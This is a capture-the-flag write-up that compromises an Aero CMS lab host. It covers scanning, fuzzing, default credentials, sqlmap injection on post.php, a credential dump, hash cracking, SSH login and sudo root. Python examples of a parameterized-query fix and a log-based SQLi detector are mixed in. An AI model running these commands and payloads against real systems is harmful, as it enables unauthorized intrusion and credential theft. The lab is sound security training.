Creator: parrotassasin15
Difficulty: Medium
Category: SQL Injection
Link: parrot-ctfs.com/hacking/labs/1
Host: 10.14.0.71
Objectives:
Obtain user & root flags
Complete all questions
Description:
Can you find the vulnerabilities in this CMS? If so, be sure to report them to their GitHub.
Set up
Before engaging anything, download your free VPN pack from the VPN tab.
After downloading your VPN pack, start the VPN using the following command:
sudo openvpn path/to/vpn.ovpn
Most of the time it will be in your Downloads folder, so the command looks like this:
sudo openvpn ~/Downloads/name.ovpn
After that, you can ping the host to ensure it's running.
Enumeration
Let's dive in with a quick nmap scan. Since the machine category and description tell us we are dealing with a CMS that is vulnerable to SQL injection, we want to know which port the CMS is running on and get an insight into which other ports are open.
nmap 10.14.0.71
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 15:24
Nmap scan report for aero (10.14.0.71)
Host is up (0.23s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
Without wasting any time, we need the CMS version running on port 80 and the GitHub repository of the CMS.
We can browse to port 80 using Firefox or your favorite browser and see if a CMS version or GitHub link is mentioned anywhere.
Common places to look: the footer of the page, source code comments, and maybe response headers. We can also use the Wappalyzer extension to check the technology stack.
After trying all of the above methods, I didn't manage to get the version, but I got the developer name in the default page footer. Guess we will have to settle for a simple Google search after all.
So we have the repo; this should lead us to the version and maybe other juicy stuff. After checking the latest commits, we get that the latest version is v0.0.1.
There is still another, easier way of getting the version that I can't remember correctly.
Now that we have the CMS version, should we fire up Nessus and Metasploit and pwn the mainframe? NO.
How can we use this version number and GitHub repo?
Search for known vulnerabilities associated with the version (which we already know is SQLi)
Check if we can find default credentials in the GitHub repo
At this point, we know that Aero CMS v0.0.1 is vulnerable to SQL injection, but where does it occur? Back to the drawing board: we need to enumerate the webpage to see where the vulnerability occurs.
To achieve this we can start by fuzzing for any endpoints or paths using Gobuster, Feroxbuster, or FFUF. Let's use Feroxbuster & FFUF recursively and simultaneously, because why not.
Here is the syntax for both:
feroxbuster --url http://10.14.0.71/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak
ffuf -u "http://10.14.0.71/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js -c
This is what we will get after running either of the above commands:
──────────────────────────────────────────────────
301 9l 28w 309c http://10.14.0.71/images
200 181l 371w 6171c http://10.14.0.71/search.php
200 233l 484w 0c http://10.14.0.71/index.php
302 179l 371w 6137c http://10.14.0.71/category.php
301 9l 28w 308c http://10.14.0.71/admin
301 9l 28w 315c http://10.14.0.71/admin/images
302 293l 627w 0c http://10.14.0.71/admin/index.php
200 138l 308w 4778c http://10.14.0.71/registration.php
302 192l 464w 7470c http://10.14.0.71/admin/comments.php
302 194l 458w 7933c http://10.14.0.71/admin/users.php
301 9l 28w 311c http://10.14.0.71/includes
200 1l 0w 1c http://10.14.0.71/includes/login.php
301 9l 28w 312c http://10.14.0.71/admin/css
200 31l 88w 988c http://10.14.0.71/includes/header.php
301 9l 28w 317c http://10.14.0.71/admin/includes
302 44l 94w 1275c http://10.14.0.71/admin/includes/header.php
301 9l 28w 313c http://10.14.0.71/javascript
301 9l 28w 308c http://10.14.0.71/fonts
Sweet, looking at that output we can see that there is an admin panel, a search page, and other good stuff like phpMyAdmin.
Remember that we can get the default username and password from the GitHub repo or from our target's homepage: Username: admin and Password: password.
With those credentials, we can edit posts on the blog, add users, and give them permissions, but that's not our goal; we need to know where the SQLi occurs.
Okay so, this is what we have so far on the blog paths:
/search.php
/login.php
/post.php
/admin.php
/category.php
-------snip--------
Well, this is where we channel our inner 1337_h4x0r moment.
Exploitation
We can fire up the old reliable sqlmap or decide to do the injection manually on the following endpoints:
category.php?category=1
post.php?p_id=1
If you browse all the paths properly, it is like a buffet of user input.
As a hater and an elite hacker man, we are going to target http://10.14.0.71/post.php?p_id=1. There are other parts we can test for SQL injection, like the search bar using Burp Suite, but let's stick with /post.php?p_id=1.
Let's craft the sqlmap syntax to trigger the vulnerability.
sqlmap -u "http://10.14.0.71/post.php?p_id=1" --dbms mysql --level 3 --risk 3
We are using the --dbms flag because we already know the database runs on MySQL from the info we got from the Wappalyzer extension.
After running the above command we get the following output from sqlmap:
---
Parameter: p_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p_id=1 AND 5165=5165
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p_id=1 AND (SELECT 9525 FROM (SELECT(SLEEP(5)))Yhmj)
---
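To see what that boolean-based finding means for the code behind post.php, here is an added example (mine, not Aero CMS's source, which is not reproduced in this write-up) of the two ways a handler can build the query. It uses Python with an in-memory SQLite table standing in for the CMS database, so the table name, columns and rows are assumptions; the payload is the one sqlmap reported above. The time-based payload is not shown because SQLite has no SLEEP().

```python
import sqlite3

# Constructed stand-in for the CMS posts table; it is not Aero CMS's real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (p_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)",
                     [(1, "First post"), (2, "Second post")])
    return conn

def fetch_post_vulnerable(conn, p_id):
    # The pattern behind an injectable post.php: the raw query-string value is
    # pasted into the SQL text, so "1 AND 5165=5165" becomes part of the WHERE clause.
    sql = "SELECT title FROM posts WHERE p_id = " + p_id
    return [row[0] for row in conn.execute(sql)]

def fetch_post_safe(conn, p_id):
    # Fix: validate the type first, then pass the value as a bound parameter.
    # The SQL text is constant; the input can only ever be compared as a number.
    try:
        pid = int(p_id)
    except (TypeError, ValueError):
        return []
    rows = conn.execute("SELECT title FROM posts WHERE p_id = ?", (pid,))
    return [row[0] for row in rows]

def boolean_blind_differential(fetch, conn, base="1"):
    # The observation sqlmap's boolean-based test relies on: does appending a true
    # condition and a false condition to the same value yield different responses?
    # A handler that treats p_id as data, not SQL, answers the same way for both.
    true_resp = fetch(conn, f"{base} AND 5165=5165")
    false_resp = fetch(conn, f"{base} AND 5165=5166")
    return true_resp != false_resp

if __name__ == "__main__":
    db = make_db()
    print(fetch_post_vulnerable(db, "1 AND 5165=5165"))  # ['First post']: condition folded into the query
    print(fetch_post_safe(db, "1 AND 5165=5165"))        # []: rejected as a non-integer id
    print(boolean_blind_differential(fetch_post_vulnerable, db))  # True
    print(boolean_blind_differential(fetch_post_safe, db))        # False
```

The first handler returns a different page for a true and a false condition, which is exactly the difference sqlmap's boolean-based test measures. The second returns the same empty result for both, because the input is validated as an integer and bound as a parameter, so there is no SQL text for it to alter; a regression check like boolean_blind_differential is a cheap way to keep that property in place after the fix.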
We are golden! p_id parameter it is. Now it's time to get the credz.
Time to dump some more info and see what we will work with. Take this syntax and slap it right on the terminal:
sqlmap -u "http://10.14.0.71/post.php?p_id=1" --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
It would be quicker to dump the info one piece at a time, from the database name down to the columns.
database management system users [7]:
[*] 'debian-sys-maint'@'localhost'
[*] 'mysql.infoschema'@'localhost'
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'neil'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'localhost'
Oooow, look at that Neil guy. He looks famous; I wonder what he did back then. We won't mind getting his password hash.
sqlmap -u "http://10.14.0.71/post.php?p_id=1" -p p_id -D aerocms -T users -C user_id,username,password --dump --threads=6
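From the defender's side, every sqlmap run above leaves a trail in the web server's access log. The following is an added example of detection logic, not part of this write-up or of the CMS: a small Python scanner run over a few constructed Apache combined-format log lines whose query strings mirror the payloads sqlmap reported against p_id. The client IPs, timestamps and user-agent strings in the sample are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines (not from the lab's server); the
# query strings reproduce the payloads sqlmap reported against p_id.
SAMPLE_LOG = """\
10.14.0.5 - - [02/May/2023:15:40:01 +0000] "GET /post.php?p_id=1 HTTP/1.1" 200 6171 "-" "Mozilla/5.0"
10.14.0.5 - - [02/May/2023:15:40:02 +0000] "GET /post.php?p_id=1%20AND%205165%3D5165 HTTP/1.1" 200 6171 "-" "sqlmap/1.7"
10.14.0.5 - - [02/May/2023:15:40:03 +0000] "GET /post.php?p_id=1%20AND%20%28SELECT%209525%20FROM%20%28SELECT%28SLEEP%285%29%29%29Yhmj%29 HTTP/1.1" 200 6171 "-" "sqlmap/1.7"
10.14.0.9 - - [02/May/2023:15:41:10 +0000] "GET /category.php?category=2 HTTP/1.1" 200 6137 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures for the two techniques sqlmap reported: a numeric tautology appended
# with AND/OR, and a call to a time-delay function.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}

def scan_line(line):
    """Return a list of findings for one access-log line (empty if it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes names and values, so the signatures run on the
    # same text the database would have received.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for technique, rx in SIGNATURES.items():
            if rx.search(value):
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "path": parts.path, "param": name,
                                 "technique": technique})
    # A scanner that does not bother to change its user-agent is the easy case.
    if "sqlmap" in m.group("ua").lower():
        findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "path": parts.path, "param": None,
                         "technique": "scanner user-agent"})
    return findings

def scan_log(text):
    """Scan every non-empty line of an access log and collect the findings."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]

def sources(findings):
    """Count findings per client IP, the first thing an analyst pivots on."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["path"], h["param"], "->", h["technique"])
    print(sources(hits))  # {'10.14.0.5': 4}
```

The scanner flags the technique from the decoded parameter value rather than from the user-agent alone, since sqlmap's user-agent can be swapped with --random-agent. The time-based probe is only caught here because the payload itself contains SLEEP(); adding response time to the web server's log format, so that a burst of multi-second responses to one parameter stands out, is the more robust signal for that class.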
From here we can use John the Ripper or Hashcat to crack the above hashes using the rockyou.txt wordlist.
john neil.hash --wordlist=/home/xi/rockyou.txt
Then: john neil.hash --show
Or Hashcat: hashcat -m 3200 neil.hash rockyou.txt
where -m 3200 is hashcat's mode number for bcrypt hashes.
After retrieving the password for the user neil, we can use it to log in to the blog, but let's see if the password also works on SSH running on port 22.
ssh neil@10.14.0.71
In our case we get SSH access using the cracked password; now we can grab and submit user.txt.
neil@space:~$ cat user.txt
76*************************************fff
neil@space:~$
root.txt
First, we run the command sudo -l to check what our user neil can run on the machine.
neil@space:~$ sudo -l
Matching Defaults entries for neil on space:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User neil may run the following commands on space:
(ALL : ALL) ALL
neil@space:~$
This should be as easy as sudo su.
neil@space:~$ sudo su
root@space:/home/neil# cd ~
root@space:~# cat root.txt
2024****************************5602
root@space:~#
GGs